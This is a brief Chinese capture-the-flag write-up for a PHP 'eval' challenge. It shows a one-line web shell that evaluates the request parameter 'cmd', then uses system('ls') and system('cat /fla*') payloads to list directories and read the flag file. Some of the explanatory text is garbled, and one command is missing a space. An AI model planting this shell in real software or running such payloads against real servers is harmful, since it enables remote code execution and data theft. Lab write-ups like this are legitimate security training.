eval执行
题目
eval(xxx)函数将xxx当做PHP语言执行
<?php EVaL ($_REQUEST [“cmd”] ) ?>
_REQUEST包含了 G E T 、 _GET、 GET、_POST、$_COOKIE的所有内容,是它们的集合体。也就内是说只要用其中一种方容式做一个表单,把cmd这个变量给POST或者GET,甚至用cookies就可以把传输上去的内容执行。简而言之吧,就是执行cmd的值。以上代码就是执行cmd
先通过system构造网址,查找当前目录文件
?cmd=system('ls');
并没有发现flag,接着查看上一级目录发现flag文件之后
通过cat查看flag
?cmd=system('cat/fla*');